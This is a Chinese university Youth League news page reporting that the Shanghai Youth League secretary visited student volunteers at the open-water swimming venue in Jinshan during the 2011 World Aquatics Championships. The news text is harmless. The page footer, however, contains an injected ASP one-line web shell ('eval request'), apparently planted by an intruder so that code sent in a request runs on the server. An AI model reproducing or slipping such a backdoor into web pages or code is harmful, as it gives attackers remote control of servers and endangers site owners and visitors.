当前位置:共青团上海海洋大学委员会 >> 志愿服务 >> 志愿活动 >> 正文  
站内信息搜索:
团市委书记潘敏慰问我校世游赛金山公开水域志愿者
[2011年10月10日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

       

       

        723日上午,在公开水域游泳竞赛项目比赛的最后一天,共青团上海市委书记潘敏在我校团委书记夏雅敏的陪同下来到金山公开水域竞赛区,看望慰问奋战在高温一线的我校公开水域竞赛部志愿者。

 

          

 

                 

 

       在志愿者服务区,潘敏书记与我校公开水域志愿者亲切交谈,感谢大家为公开水域服务工作所做的努力,并向志愿者们送上上海市青年志愿者世游赛专属徽章和晒后防护品。潘敏书记说:“世游赛公开水域比赛到今天,各方运行平稳有序,得到各国友人高度赞扬,这些成绩离不开广大志愿者的辛勤付出和努力。尤其最近几天,上海地区持续高温,给志愿者工作带来了考验,希望志愿者继续以不怕苦不怕累的精神,投入到以后的其他服务工作当中,将奉献的精神发扬至极 随后,我校团委书记夏雅敏和我校公开水域志愿者代表一起向潘敏书记送上我校自主设计的志愿者徽章,感谢领导的亲切关怀,并表示将继续秉承志愿者精神积极参加各类志愿者工作,锻炼自身,服务社会。

       金山公开水域比赛结束了,我校竞赛部志愿者向世界交出了一份满意的答卷,为公开水域志愿者的服务画上了完美的句号,但是志愿者们的世泳情将永存于心,志愿者们晒黑了,辛苦了,但是他们收获了快乐,收获了经验!他们用实际行动诠释了奉献、友爱、互助、进步的志愿精神,充分展现了海大学子的风采。

 

关闭窗口

上一篇:校领导关心慰问我校世游赛志愿者

下一篇:校领导慰问我校金山公开水域比赛志愿者
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>